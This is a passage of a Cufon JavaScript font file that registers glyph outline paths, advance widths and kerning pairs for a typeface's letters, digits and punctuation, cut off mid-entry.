 * Glyphs,dataCopr.TF. All world rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"196,-202v-8,51,-49,71,-68,71r-23,53r-23,0r-2,-76v37,4,54,-14,59,-46v4,-21,-2,-40,-21,-40v-19,0,-31,12,-36,42r-29,0r10,-62v0,0,34,-8,67,-8v44,0,75,14,66,66xm118,-31v-2,41,-69,50,-63,0v3,-40,70,-50,63,0","w":168},{"d":"162,0r-151,0r3,-21v36,-50,104,-110,117,-172v5,-28,-1,-46,-19,-46v-17,0,-27,12,-32,42r-29,0r10,-62v0,0,26,-8,69,-8v44,0,67,24,58,72v-13,70,-72,94,-113,136v52,1,78,2,81,-50r23,0","k":{"9":17,"8":24,"7":41,"6":14,"5":31,"4":24,"3":29,"2":26,"1":48,"0":19,"\/":-7,".":19,"-":19,",":22}},{"d":"170,-25v0,0,-33,30,-85,30v-31,0,-75,-19,-62,-103v13,-82,63,-103,100,-103v33,0,71,22,58,106r-103,0v-15,89,67,62,97,35xm131,-121v2,-12,7,-50,-17,-50v-23,0,-30,38,-32,50r49,0","w":171,"k":{"y":5,"x":7,"w":10,"v":7,"t":5,"s":-5,"\/":-19}},{"d":"150,-59v-8,49,-45,64,-86,64v-32,0,-60,-15,-60,-15r8,-54r27,0v-3,18,0,38,23,38v15,0,29,-9,30,-23v2,-42,-78,-39,-64,-95v10,-38,40,-57,76,-57v33,0,60,9,60,9r-9,52r-27,0v3,-14,-1,-33,-20,-33v-31,0,-41,30,-1,48v33,15,48,35,43,66","w":142,"k":{"z":-5,"s":-7,"c":-5,"a":-5,"\/":-24}},{"d":"197,-98v-13,84,-53,103,-90,103v-21,0,-34,-8,-40,-13r-53,11v-6,-27,6,-11,12,-52r26,-178v-1,-6,-13,-2,-19,-3r3,-20r66,-18r11,7r-12,77v50,-36,113,-20,96,86xm141,-95v8,-51,4,-72,-18,-72v-21,0,-29,22,-32,41r-14,88v4,6,9,15,23,15v22,0,33,-22,41,-72","w":188,"k":{"y":10,"x":7,"w":7,"v":7,"b":10,"\/":-10}},{"d":"188,-90v-9,54,-45,95,-95,95v-58,0,-75,-40,-62,-136v18,-126,81,-151,174,-128r-10,62r-29,0v5,-31,-3,-42,-25,-42v-23,0,-38,17,-50,90v0,0,15,-23,43,-23v40,0,63,26,54,82xm131,-83v6,-43,0,-58,-15,-58v-15,0,-28,15,-34,58v-7,45,0,60,15,60v15,0,27,-15,34,-60","k":{"9":10,"8":12,"7":33,"6":7,"5":24,"4":12,"3":24,"2":24,"1":48,"0":5,"\/":-10,".":14,"-":5,",":17}},{"d":"132,-124v-17,108,-69,154,-125,154r3,-22v27,0,53,-46,67,-132v14,-86,2,-132,-24,-132r3,-22v56,0,93,51,76,154","w":116},{"d":"197,-13v0,0,-24,17,-47,17v-21,0,-30,-16,-30,-16v-39,25,-118,33,-96,-86v17,-91,63,-103,90,-103v24,0,32,10,32,10v0,-13,10,-30,1,-39r-16,0r3,-20r66,-18r11,7r-34,211v-5,20,11,17,16,11xm122,-41r18,-112v-3,-11,-6,-18,-19,-18v-21,0,-34,22,-42,73v-8,50,0,71,19,71v17,0,24,-14,24,-14","w":183,"k":{"z":-10,"s":-10,"r":-10,"n":-10,"m":-10,"l":-10,"k":-10,"i":-10,"h":-10,"f":-12,"b":-12,"a":-7,"\/":-39}},{"d":"260,-239v-19,0,-28,5,-41,26r-62,96v-2,29,-15,57,-9,86v3,5,10,7,14,7r-4,24r-95,0r4,-24v34,-5,25,-59,35,-91r-33,-98v-8,-17,-13,-26,-30,-26r4,-23r110,0r-4,23v-17,1,-17,13,-13,26r17,59v13,-24,31,-48,42,-74v1,-5,-4,-11,-14,-11r4,-23r78,0","w":222,"k":{"z":36,"y":22,"w":31,"v":24,"u":26,"t":24,"s":43,"r":29,"p":26,"o":58,"i":14,"g":58,"e":58,"d":43,"a":48,"Z":7,"Y":7,"X":7,"W":7,"V":7,"U":7,"S":22,"Q":28,"O":25,"G":29,"C":26,"A":43,";":39,":":39,"\/":19,".":60,"-":48,",":60}},{"d":"71,44r-70,0r52,-322r69,0r-4,24r-16,0r-44,274r16,0","w":83},{"d":"68,44r-69,0r4,-24r15,0r44,-274r-16,0r4,-24r70,0","w":83},{"d":"221,-188r-13,33r-44,0r-11,32r44,0r-11,33r-44,0r-36,103r-28,0r36,-103r-26,0r-36,103r-28,0r36,-103r-43,0r12,-33r43,0r12,-32r-44,0r12,-33r43,0r32,-91r27,0r-31,91r26,0r31,-91r28,0r-32,91r45,0xm137,-155r-26,0r-11,32r26,0","w":191,"k":{"1":29}},{"d":"225,0r-94,0r4,-24v35,-5,25,-65,35,-99r-72,0v-3,31,-16,61,-10,92v3,5,8,7,13,7r-4,24r-93,0r4,-24v12,1,22,-15,23,-26r26,-162v4,-13,-5,-28,-15,-27r4,-23r93,0r-4,23v-32,7,-24,56,-32,87r72,0v2,-26,15,-53,8,-79v-3,-5,-9,-8,-13,-8r4,-23r93,0r-4,23v-12,0,-22,15,-23,27r-26,162v-4,12,4,27,15,26","w":230,"k":{"z":-3,"y":7,"w":7,"v":7,"t":7,"q":10,"o":10,"l":-5,"e":10,"a":10,"B":-5,"\/":-19}},{"d":"246,-131v-17,104,-77,136,-130,136v-53,0,-102,-28,-85,-136v17,-104,76,-136,129,-136v53,0,104,27,86,136xm188,-131v13,-81,-1,-108,-33,-108v-32,0,-54,27,-67,108v-13,81,2,107,33,107v32,0,54,-26,67,-107","w":234,"k":{"Y":22,"X":22,"W":17,"V":17,"U":3,"T":10,"S":-3,"A":24,";":-3,":":-3,"\/":-7,".":22,",":19}},{"d":"229,0r-80,0r-51,-108r-3,0v-2,25,-14,52,-7,77v3,5,8,7,13,7r-4,24r-93,0r4,-24v12,2,22,-15,23,-26r26,-163v3,-13,-5,-27,-16,-26r4,-23v76,3,186,-22,172,71v-7,46,-35,67,-62,76r57,84v5,4,12,7,21,7xm159,-186v10,-44,-23,-58,-45,-42r-15,95v39,2,51,-15,60,-53","w":198,"k":{"y":-5,"u":-6,"t":-7,"s":-24,"p":-5,"j":-26,"g":-29,"f":-3,"d":-5,"b":-7,"a":-19,"Z":-10,"Y":15,"W":15,"V":15,"S":-10,"R":3,"P":3,"M":3,"J":-24,"\/":-62,".":-39,"-":11,",":-36}},{"d":"143,-23v0,0,-33,28,-65,28v-26,0,-50,-16,-42,-64r17,-107r-22,0r4,-29r25,0r8,-50r54,-16r-11,66r51,0r-5,29r-50,0r-16,100v-13,45,41,25,48,17","w":132,"k":{"z":-10,"y":-10,"x":-7,"s":-10,"r":-7,"p":-5,"n":-10,"m":-10,"j":-7,"i":-10,"f":-10,"e":5,"a":-7,";":-7,":":-7,"\/":-36,".":-10,"-":-5,",":-7}},{"d":"226,0r-100,0r4,-24v33,-3,10,-49,12,-74r-55,0r-25,63v-1,5,4,11,14,11r-4,24r-71,0r4,-24v13,0,22,-8,30,-26r91,-212r53,0r28,212v3,23,11,26,22,26xm139,-122r-10,-79r-32,79r42,0","w":227,"k":{"z":5,"y":24,"x":22,"w":26,"v":26,"u":12,"t":19,"s":12,"r":17,"q":14,"p":10,"o":14,"g":10,"f":22,"e":14,"d":14,"c":14,"b":14,"a":14,"Y":39,"X":22,"W":39,"V":39,"U":24,"T":22,"S":6,"Q":22,"O":22,"G":22,"C":22,"A":23,";":-3,":":3,"\/":-23,".":-7,"-":19,",":-7}},{"d":"273,0r-94,0r4,-24v12,1,22,-15,23,-26r23,-143r-88,179r-35,0r-26,-179r-23,143v-4,12,4,27,15,26r-4,24r-64,0r4,-24v12,2,22,-15,23,-26r26,-168v2,-14,-2,-21,-15,-20r4,-24r84,0r24,173r83,-173r77,0r-3,24v-12,-1,-22,14,-24,26r-26,162v-4,12,4,27,15,26","w":276,"k":{"y":3,"t":5,"s":3,"o":12,"l":-5,"g":5,"e":10,"d":7,"c":7,"a":7,"R":-5,"P":-5,"E":-5,"D":-5,"B":-5,"\/":-24}},{"d":"200,-171v-13,0,-16,2,-27,26r-64,145r-46,0r-16,-145v-3,-23,-3,-26,-17,-26r3,-24r87,0r-4,24v-17,0,-14,13,-13,26r8,79r39,-95v1,-5,0,-10,-10,-10r4,-24r60,0","w":172,"k":{"z":1,"y":-7,"w":-7,"v":-7,"t":-5,"q":10,"o":10,"n":-5,"m":-5,"k":5,"j":-7,"i":-5,"h":5,"g":7,"f":-5,"e":10,"d":7,"c":7,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"142,-239v-19,0,-20,12,-19,27r9,150r67,-200r45,0r8,199r62,-165v1,-5,-2,-11,-14,-11r3,-23r71,0r-4,23v-13,0,-23,9,-30,27r-85,212r-52,0r-8,-170r-61,170r-52,0r-20,-212v-2,-22,-12,-27,-23,-27r4,-23r103,0","w":332,"k":{"y":10,"u":24,"t":12,"s":24,"r":17,"p":22,"o":39,"n":22,"m":26,"l":5,"k":7,"i":14,"h":7,"e":39,"d":31,"a":29,"Z":5,"U":19,"S":14,"Q":22,"O":23,"G":15,"C":15,"A":43,";":22,":":14,"\/":17,".":50,"-":26,",":50}},{"d":"222,-183r-25,0v7,-36,0,-53,-36,-52r-30,185v-4,15,6,28,20,26r-4,24r-101,0r4,-24v16,2,24,-14,26,-26r29,-185v-33,-1,-44,16,-49,52r-25,0r12,-79r192,0","w":194,"k":{"z":3,"y":-5,"x":3,"w":-3,"v":-3,"u":5,"s":19,"r":5,"p":14,"o":40,"n":5,"m":5,"g":30,"e":39,"d":31,"c":23,"a":12,"Z":5,"Y":-3,"V":-3,"T":-7,"S":-3,"R":-3,"Q":14,"P":-5,"O":12,"N":-3,"M":-3,"G":5,"C":10,"A":23,";":12,":":12,"\/":5,".":53,"-":44,",":53}},{"d":"144,0r-142,0r3,-20r99,-148v-31,-2,-54,5,-54,29r-21,0r9,-56r134,0r-3,21r-98,146v37,2,58,-3,61,-38r22,0","w":145,"k":{"z":-7,"s":-7,"r":-7,"f":-10,"a":-5,"\/":-31}},{"d":"186,-66r-31,0v-4,15,-8,42,12,42r-4,24r-93,0r4,-24v18,-1,24,-24,26,-42r-94,0r143,-196r37,0r-26,164r31,0xm105,-98r13,-80r-54,80r41,0","k":{"9":14,"8":14,"7":43,"6":10,"5":24,"4":5,"3":24,"2":24,"1":46,"0":12,"\/":-17,".":12,"-":3,",":12}},{"d":"175,71r-93,0r3,-23v26,-1,27,-32,31,-56v-12,9,-20,13,-34,13v-39,0,-75,-19,-60,-103v18,-100,67,-120,134,-91v14,-4,30,-20,43,-8r-34,219v-4,12,4,27,14,26xm121,-41r18,-112v0,0,-1,-18,-18,-18v-23,0,-35,22,-43,73v-8,50,-4,71,20,71v12,0,23,-14,23,-14","w":181,"k":{"j":-46,"\/":-29,"-":-7}},{"d":"120,-106v-60,11,-7,144,-80,150r-43,0r3,-24v58,-1,11,-115,65,-128r3,-20v-12,0,-18,-10,-16,-24r12,-79v2,-14,-4,-25,-19,-23r3,-24v40,0,79,-9,71,41r-14,83v-2,12,4,24,19,24","w":102},{"d":"189,-123v-19,22,-37,73,-78,55v-24,-12,-58,-40,-76,-6r-15,-11v20,-22,36,-74,78,-55v24,11,58,38,77,6","w":174},{"d":"192,-98v-13,84,-67,103,-102,103v-35,0,-81,-19,-68,-103v13,-81,66,-103,101,-103v35,0,82,22,69,103xm136,-98v8,-51,4,-76,-17,-76v-21,0,-34,25,-42,76v-8,50,-3,76,18,76v21,0,33,-26,41,-76","w":182,"k":{"z":7,"y":12,"x":10,"w":12,"v":12,"t":7,"r":5,"p":7,"l":5,"k":5,"h":5,"f":5,"b":7,"\/":-14}},{"w":83},{"d":"176,-211r-27,0v3,-17,0,-29,-14,-29v-17,0,-23,24,-26,45r50,0r-4,29r-50,0v-4,45,-22,90,-17,135v3,5,7,7,20,7r-4,24r-101,0r3,-24v17,1,24,-12,26,-26r19,-116r-23,0r5,-29v9,-1,26,5,24,-7v5,-36,30,-65,72,-65v35,0,55,9,55,9","w":130,"k":{"z":-7,"y":-7,"t":-7,"r":-7,"o":12,"l":-19,"k":-17,"j":-7,"e":7,"d":7,"b":-24,";":-7,":":-7,"\/":-12,".":22,"-":14,",":29}},{"d":"100,-157r-29,79r-24,0r-3,-79r17,-105r55,0xm83,-31v-3,19,-19,36,-37,36v-17,0,-30,-17,-27,-36v3,-20,20,-35,38,-35v17,0,29,15,26,35","w":93},{"w":83},{"d":"193,-39v8,33,-3,43,-43,43v-21,0,-27,-16,-27,-16v0,0,-20,17,-51,17v-77,0,-20,-112,-24,-168v-2,-6,-13,-2,-20,-3r4,-20r66,-17r10,6r-22,139v-2,12,-1,28,14,28v15,0,22,-15,22,-15r18,-118v-3,-5,-13,-2,-20,-3r3,-20r66,-17r11,6r-24,147v-5,20,12,17,17,11","w":190,"k":{"y":5,"w":12,"v":10,"u":5,"t":5,"p":5,"b":5,"\/":-26}},{"d":"174,0r-87,0r3,-24v18,-6,-1,-34,-3,-46v-7,12,-19,24,-23,39v-2,6,4,7,7,7r-4,24r-67,0r4,-24v27,-7,51,-54,70,-76v-11,-21,-18,-69,-42,-71r4,-24r88,0r-3,24v-21,2,-5,26,-2,36v6,-8,14,-18,17,-28v1,-6,0,-8,-5,-8r3,-24r66,0r-4,24v-25,2,-46,46,-65,63r24,58v5,11,12,26,23,26","w":172,"k":{"o":10,"i":-7,"f":-7,"e":5,"d":5,"c":5,"\/":-31,"-":14}},{"d":"169,-85v-8,47,-48,68,-70,68r-6,38r-21,0r5,-37v-36,0,-55,-22,-55,-22r9,-54r26,0v-3,19,-2,46,24,46v37,0,43,-52,9,-70v-20,-11,-48,-31,-42,-70v5,-33,33,-58,66,-58r5,-29r21,0r-5,29v29,0,49,15,49,15r-8,51r-27,0v3,-19,-2,-38,-20,-38v-31,0,-38,38,-4,57v27,15,51,31,44,74","w":168,"k":{"1":46}},{"d":"199,-154v-23,-1,-23,7,-27,27v-13,60,-56,70,-83,70v-36,0,-41,18,-20,18v55,0,105,3,95,54v-9,46,-57,65,-95,65v-45,0,-83,-10,-78,-44v5,-35,45,-37,45,-37v0,0,-33,-5,-29,-30v4,-22,30,-36,46,-36v0,0,-34,-14,-26,-60v9,-52,47,-74,85,-74v44,0,43,40,46,24v4,-25,22,-25,48,-24xm122,-129v5,-33,-2,-45,-15,-45v-13,0,-24,12,-29,45v-5,31,2,45,15,45v13,0,24,-14,29,-45xm111,28v6,-21,-28,-25,-60,-24v0,0,-6,7,-7,18v-4,25,10,31,28,31v25,0,36,-13,39,-25","w":166,"k":{"y":-7,"x":-10,"s":-7,"j":-31,"\/":-29}},{"d":"152,67r-162,0r2,-17r162,0","w":160},{"d":"300,-171v-13,0,-17,2,-28,26r-64,145r-46,0r-10,-97r-43,97r-46,0r-15,-145v-3,-23,-4,-26,-18,-26r3,-24r87,0r-3,24v-18,0,-16,13,-14,26r8,79r39,-95v1,-5,0,-10,-10,-10r4,-24r75,0r-3,24v-17,0,-17,12,-15,26r9,79r39,-95v1,-5,-1,-10,-10,-10r4,-24r60,0","w":271,"k":{"q":10,"o":10,"j":-7,"i":-5,"g":5,"f":-5,"e":10,"d":10,"c":10,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"201,-171v-13,0,-17,2,-28,26r-78,178v-15,35,-40,47,-64,47v-28,0,-42,-11,-42,-11r8,-54r24,0v-5,34,42,33,51,7r10,-22r-19,0r-17,-145v-3,-22,-4,-26,-18,-26r3,-24r89,0r-3,24v-18,0,-16,13,-14,26r8,79r39,-95v1,-5,0,-10,-10,-10r4,-24r60,0","w":172,"k":{"z":3,"y":-7,"s":5,"q":10,"o":10,"g":7,"e":10,"d":10,"c":10,"a":5,";":-3,":":-3,".":36,"-":12,",":36}},{"d":"145,-267r-28,96r-21,0r3,-96r46,0xm92,-267r-28,96r-21,0r3,-96r46,0","w":104,"k":{".":134,",":137}},{"d":"215,-262r-123,262r-57,0r128,-201r-104,0r10,-61r146,0","k":{";":36,":":36,"9":24,"8":33,"7":36,"6":29,"5":36,"4":50,"3":33,"2":26,"1":53,"0":29,"\/":19,".":72,"-":36,",":62}},{"d":"83,16r-31,0r-10,-294r31,0","w":77},{"d":"266,0r-83,0v3,-15,-2,-24,12,-31v14,-25,12,-62,19,-93v5,-23,3,-40,-10,-40v-12,0,-18,17,-21,40v-4,31,-15,62,-11,93v11,9,2,18,2,31r-76,0v4,-14,-1,-24,13,-31v13,-25,13,-62,19,-93v5,-23,3,-40,-10,-40v-13,0,-19,17,-22,40v-4,31,-15,62,-11,93v11,9,2,18,2,31r-84,0r4,-24v13,1,22,-15,23,-26r16,-112v-2,-5,-11,-4,-18,-4r3,-20v26,-3,55,-24,77,-11r-4,20v0,0,15,-24,43,-24v27,0,34,24,34,24v0,0,13,-24,48,-24v23,0,43,20,37,70v-4,33,-17,67,-11,100v3,5,9,7,13,7","w":265,"k":{"z":-5,"y":10,"w":12,"v":10,"u":5,"t":10,"p":7,"o":5,"e":5,"b":5,"\/":-26}},{"d":"224,-191v-17,86,-75,83,-128,83v-2,25,-14,52,-7,77v3,5,10,7,16,7r-4,24r-96,0r4,-24v12,1,21,-16,23,-26r26,-163v2,-13,-5,-28,-19,-26r4,-23v79,4,199,-22,181,71xm166,-190v11,-45,-29,-51,-50,-39r-16,94v42,3,56,-13,66,-55","w":197,"k":{"y":-5,"v":-5,"s":3,"o":12,"i":-5,"g":7,"e":12,"d":12,"c":10,"a":10,"Z":5,"Y":18,"X":17,"W":7,"V":12,"U":10,"T":-3,"S":-3,"R":5,"P":5,"N":5,"M":5,"L":5,"K":5,"D":7,"B":3,"A":41,";":3,":":3,"\/":7,".":48,"-":14,",":48}},{"d":"144,0r-108,0r4,-24v18,1,28,-10,31,-26r25,-157r-26,4r6,-33r86,-31r-36,217v-2,15,3,28,22,26","k":{"s":39,"p":46,"a":46,":":50,"9":53,"8":60,"7":77,"6":55,"5":58,"4":55,"3":60,"2":53,"1":78,"0":53,"\/":17,".":48,"-":65,",":55,"'":72,"\"":55}},{"d":"81,-23v-6,37,-33,81,-33,81r-25,0v0,0,15,-29,19,-50v9,-49,-23,-2,-20,-54v1,-18,18,-29,33,-29v16,0,32,11,26,52","w":93,"k":{"H":-3,"1":36,"0":22,"'":118,"\"":103}},{"d":"96,0r-91,0r3,-24v11,1,21,-15,23,-26r27,-177v-1,-5,-13,-2,-19,-3r3,-20r66,-18r10,7r-33,211v-3,12,3,27,15,26","w":97,"k":{"z":-3,"y":5,"x":-5,"w":7,"v":5,"t":7,"p":5,"\/":-29}},{"d":"160,-136r-31,0v3,-18,-1,-25,-11,-25v-24,0,-26,81,-33,111v-4,12,4,27,15,26r-3,24r-92,0r3,-24v11,1,23,-15,23,-26v0,-38,16,-75,15,-112v-2,-6,-11,-4,-18,-4r4,-20v25,-3,54,-24,76,-11r-5,25v0,0,14,-31,39,-31v43,10,18,37,18,67","w":138,"k":{"z":-3,"y":-7,"x":-3,"w":-5,"v":-5,"u":-7,"t":-5,"s":-3,"r":-7,"p":-5,"o":5,"n":-7,"m":-5,"k":5,"j":-7,"i":-5,"f":-7,";":-5,":":-5,"\/":-12,".":36,",":36}},{"d":"199,0r-103,0r4,-24v28,-10,-3,-48,-5,-67r-4,0v-1,20,-15,54,0,67r-4,24r-82,0r3,-24v11,1,21,-15,23,-26r27,-177v-1,-6,-13,-2,-19,-3r3,-20r66,-18r10,7r-23,144r40,-50v0,-2,-6,-4,-12,-4r4,-24r92,0r-4,24v-30,4,-53,31,-75,45r35,71v11,23,18,31,28,31","w":188,"k":{"z":-10,"y":-7,"x":-12,"s":-7,"r":-14,"n":-14,"m":-12,"j":-10,"i":-14,"g":-7,"f":-12,"e":10,"b":-10,";":-12,":":-12,"\/":-43,".":-14,"-":12,",":-12,"!":-12}},{"d":"161,-26r-127,-83r6,-41r155,-84r-4,24r-100,80r74,81","w":168},{"d":"188,0r-89,0r4,-24v31,-10,25,-66,33,-100v6,-23,2,-40,-13,-40v-35,0,-27,79,-38,114v-3,11,4,27,13,26r-4,24r-89,0r3,-24v11,1,21,-15,23,-26r28,-178v-3,-4,-13,-1,-20,-2r3,-20r66,-18r10,7r-12,79v0,0,13,-19,43,-19v28,0,47,20,41,70v-4,33,-18,68,-10,100v3,5,7,7,12,7","w":188,"k":{"y":10,"x":7,"w":17,"v":14,"u":7,"t":12,"f":5,"e":7,"b":7,"a":5,"\/":-26}},{"d":"192,-131v-17,125,-84,151,-177,128r10,-63r29,0v-5,31,4,43,26,43v22,0,39,-18,51,-91v0,0,-15,24,-43,24v-40,0,-62,-26,-53,-82v9,-53,44,-95,94,-95v58,0,76,40,63,136xm141,-180v7,-45,0,-59,-15,-59v-15,0,-28,14,-35,59v-7,43,1,58,16,58v15,0,27,-15,34,-58","k":{"9":7,"8":14,"7":39,"6":7,"5":26,"4":19,"3":31,"2":31,"1":51,"0":5,"\/":-5,".":19,"-":7,",":24}},{"d":"52,20r-28,0r48,-298r28,0","w":83},{"d":"100,30v-56,0,-93,-46,-76,-154v17,-103,69,-154,125,-154r-3,22v-27,0,-53,46,-67,132v-14,86,-2,132,25,132","w":116},{"d":"179,-80v-9,58,-51,84,-97,84v-41,0,-77,-17,-77,-17r10,-63r28,0v-6,40,9,52,31,52v29,0,40,-24,43,-42v11,-59,-96,-55,-78,-127v13,-51,47,-74,94,-74v35,0,62,7,62,7r-10,61r-28,0v4,-27,-7,-40,-26,-40v-15,0,-28,12,-32,35v-4,24,9,32,40,48v30,15,46,37,40,76","w":165,"k":{"z":-3,"y":7,"x":7,"w":14,"v":10,"u":5,"t":7,"s":-5,"r":3,"q":-7,"p":7,"o":-7,"c":-7,"a":-7,"Z":5,"Y":11,"X":10,"W":11,"V":11,"U":10,"S":-3,"R":5,"N":5,"M":5,"G":-7,"A":19,"\/":-22,"-":-5}},{"d":"186,-75v-8,50,-54,80,-96,80v-42,0,-79,-19,-71,-70v8,-53,56,-65,56,-65v0,0,-35,-17,-28,-63v8,-48,47,-74,89,-74v43,0,67,23,61,63v-6,41,-50,60,-50,60v0,0,48,13,39,69xm150,-203v4,-22,-3,-39,-18,-39v-16,0,-29,10,-33,37v-5,29,22,42,27,42v4,0,20,-16,24,-40xm128,-67v4,-22,-9,-45,-28,-45v-27,-1,-48,89,-8,90v16,0,31,-15,36,-45","k":{"9":12,"8":12,"7":36,"6":10,"5":22,"4":12,"3":24,"2":29,"1":47,"0":12,"\/":-14,".":12,"-":5,",":10}},{"d":"198,-131v-17,103,-67,136,-107,136v-40,0,-80,-28,-63,-136v17,-104,67,-136,107,-136v40,0,81,28,63,136xm141,-131v13,-81,10,-108,-10,-108v-20,0,-33,27,-46,108v-13,81,-9,108,11,108v20,0,32,-27,45,-108","k":{"9":1,"8":10,"7":32,"6":-5,"5":14,"4":5,"3":22,"2":19,"1":39,"\/":-7,".":12,",":14}},{"d":"184,0r-180,0r4,-24v12,2,22,-15,23,-26r26,-163v4,-12,-6,-27,-15,-26r4,-23r94,0r-4,23v-12,-1,-23,15,-24,26r-26,162v-2,13,5,23,26,23v43,0,52,-18,57,-53r28,0","w":187,"k":{"y":10,"w":14,"v":14,"t":12,"g":-5,"b":7,"a":-5,"Y":41,"X":10,"W":41,"V":41,"U":22,"T":33,"S":-3,"Q":14,"P":5,"O":14,"N":5,"M":3,"J":5,"G":14,"D":5,"C":14,"A":10,"\/":-22,".":-7}},{"d":"49,-157v4,-12,-10,-9,-19,-9r3,-20r66,-17r11,6r-4,20v22,-35,100,-35,85,46v-6,33,-18,68,-10,100v3,5,7,7,12,7r-4,24r-89,0r4,-24v31,-10,25,-66,33,-100v5,-23,2,-40,-13,-40v-35,0,-27,79,-38,114v-3,11,4,27,13,26r-4,24r-90,0r4,-24v12,2,22,-15,23,-26","w":188,"k":{"z":-5,"y":10,"w":12,"v":10,"u":5,"t":7,"p":5,"o":5,"e":7,"b":5,"\/":-29,".":-5,",":-3}},{"d":"216,-107v-35,11,-25,71,-36,107r-19,0v1,-5,-2,-11,-10,-11v-19,0,-31,16,-68,16v-55,0,-70,-28,-63,-78v7,-46,39,-66,73,-69v-25,0,-48,-15,-41,-57v7,-45,39,-68,91,-68v27,0,66,7,66,7r-10,63r-29,0v5,-31,-4,-42,-26,-42v-19,0,-32,13,-37,45v-4,30,0,39,18,38r-4,29v-27,-1,-36,11,-45,52v-13,60,52,66,59,16v3,-17,8,-47,-12,-48r4,-23r93,0","w":201},{"d":"92,44v-41,2,-77,3,-70,-41r13,-86v2,-12,-3,-23,-18,-23r4,-24v58,-11,7,-145,79,-148r44,0r-4,24v-57,2,-10,113,-64,126r-3,20v11,0,19,9,16,23r-13,82v-2,14,4,25,20,23","w":102},{"d":"121,-84r-98,0r5,-35r99,0","w":117,"k":{"z":3,"y":14,"x":19,"w":14,"t":5,"s":-5,"r":5,"p":10,"k":7,"Z":14,"Y":39,"X":29,"W":28,"V":24,"T":42,"S":5,"R":7,"P":7,"L":10,"F":12,"E":10,"A":24,"9":7,"8":5,"7":39,"6":-3,"5":22,"4":-3,"3":24,"2":33,"1":58}},{"d":"83,-31v-3,19,-19,36,-37,36v-17,0,-30,-17,-27,-36v3,-20,20,-35,38,-35v17,0,29,15,26,35","w":93,"k":{"1":36,"0":17,"'":113,"\"":105}},{"d":"124,-232r-26,13r22,14r-13,20r-18,-18r-3,32r-19,0r7,-32r-24,18r-6,-19r26,-15r-21,-14r12,-20r18,19r3,-32r20,0r-8,32r24,-18","w":82},{"d":"240,-106v-33,7,-25,62,-34,94v0,0,-43,17,-93,17v-66,0,-104,-40,-88,-138v16,-98,75,-134,132,-134v53,0,80,8,80,8r-10,62r-29,0v5,-32,-13,-42,-37,-42v-32,0,-66,21,-79,106v-14,85,15,108,44,108v32,0,41,-43,35,-74v-3,-5,-9,-7,-13,-7r4,-24r92,0","w":219,"k":{"Y":12,"X":12,"W":12,"V":12,"T":5,"S":-7,"P":-5,"L":-5,"J":-7,"I":-5,"C":-5,"A":11,"\/":-14,"-":-12}},{"d":"174,-73v-9,53,-46,78,-89,78v-41,0,-65,-8,-65,-8r10,-64r29,0v-5,30,4,43,21,43v18,0,32,-17,38,-51v6,-30,-9,-56,-50,-50r4,-29v39,4,60,-15,64,-43v3,-25,-1,-42,-20,-42v-17,0,-27,13,-32,42r-29,0r10,-62v0,0,24,-8,64,-8v42,0,69,16,61,65v-8,50,-53,63,-70,63v27,0,62,18,54,66","k":{"9":22,"8":22,"7":43,"6":19,"5":36,"4":24,"3":36,"2":33,"1":55,"0":19,"\/":3,".":24,"-":22,",":29}},{"d":"120,-250v-3,39,-68,46,-61,0v3,-40,68,-48,61,0xm80,-22v-20,88,-55,92,-124,86r5,-27v44,-1,58,-8,66,-60v7,-47,19,-93,21,-140v-2,-6,-13,-2,-20,-3r4,-20r66,-17r10,6","w":91,"k":{"t":5,"o":5,"j":-12,"e":5,"\/":-17}},{"d":"256,-239v-10,-1,-21,15,-23,26r-18,112v-13,82,-55,106,-103,106v-47,0,-82,-20,-70,-106v6,-43,21,-87,16,-130v-4,-6,-8,-8,-13,-8r4,-23r93,0r-4,23v-11,-1,-20,15,-22,26r-18,113v-9,54,9,67,34,67v25,0,49,-16,56,-67v6,-43,21,-88,16,-131v-3,-6,-8,-8,-12,-8r3,-23r65,0","w":223,"k":{"z":10,"y":10,"x":10,"w":12,"v":10,"u":10,"t":12,"s":14,"r":10,"p":14,"n":10,"m":10,"g":12,"e":12,"d":12,"a":17,"Z":11,"Y":5,"X":5,"W":3,"V":5,"U":5,"S":5,"R":5,"Q":5,"O":5,"N":5,"M":5,"L":5,"K":3,"G":7,"F":3,"E":3,"D":5,"C":7,"A":36,"\/":5,".":33,",":33}},{"d":"171,-109r-155,83r4,-23r101,-81r-75,-80r4,-24r127,84","w":168},{"d":"103,-156v-3,42,-70,50,-63,0v2,-41,70,-49,63,0xm85,-40v-3,40,-70,49,-64,0v3,-42,70,-51,64,0","w":93,"k":{"1":36}},{"d":"202,-12v0,0,-33,17,-85,17v-66,0,-105,-40,-89,-139v16,-97,75,-133,132,-133v52,0,79,8,79,8r-9,62r-29,0v4,-27,-6,-42,-37,-42v-32,0,-66,20,-79,105v-14,85,15,108,44,108v33,0,50,-16,55,-47r28,0","w":211,"k":{"y":8,"o":10,"e":10,"Z":5,"Y":12,"X":7,"W":7,"V":10,"U":7,"T":3,"S":3,"Q":10,"O":10,"J":-7,"G":12,"F":3,"E":5,"D":-5,"C":12,"B":-5,"A":17,";":-5,":":-5,"\/":-14}},{"d":"211,-193r-26,0v5,-35,-1,-42,-43,-42v-44,-1,-30,56,-41,89v27,0,39,-2,46,-40r23,0r-17,103r-23,0v5,-34,-7,-39,-32,-38v-3,30,-16,60,-10,90v3,5,9,7,14,7r-4,24r-94,0r4,-24v12,1,22,-15,23,-26r26,-162v4,-13,-5,-28,-15,-27r4,-23r176,0","w":178,"k":{"y":-1,"x":3,"w":3,"u":5,"s":19,"r":-3,"o":22,"l":-7,"j":-3,"e":17,"d":13,"a":12,"Z":-3,"Y":-5,"X":-7,"W":-10,"T":-14,"S":-5,"R":-7,"Q":5,"P":-10,"O":5,"L":-5,"K":-5,"J":-5,"I":-5,"H":-7,"G":3,"F":-5,"E":-7,"D":-7,"C":3,"B":-7,"A":36,"\/":5,".":41,"-":17,",":39}},{"d":"183,0r-181,0r3,-20r144,-215v-51,-2,-86,2,-85,47r-24,0r13,-74r167,0r-3,20r-144,212v58,2,100,2,101,-54r23,0","w":185,"k":{"y":5,"a":-7,"U":5,"T":-5,"S":-5,"Q":5,"O":5,"G":5,"C":5,"A":7,"\/":-29,".":-7,"-":3}},{"d":"139,-239v-11,-1,-22,15,-23,26r-27,172v-18,90,-56,104,-134,97r5,-30v52,0,64,-16,73,-70r28,-169v4,-12,-5,-27,-15,-26r4,-23r93,0","w":104,"k":{"u":7,"r":5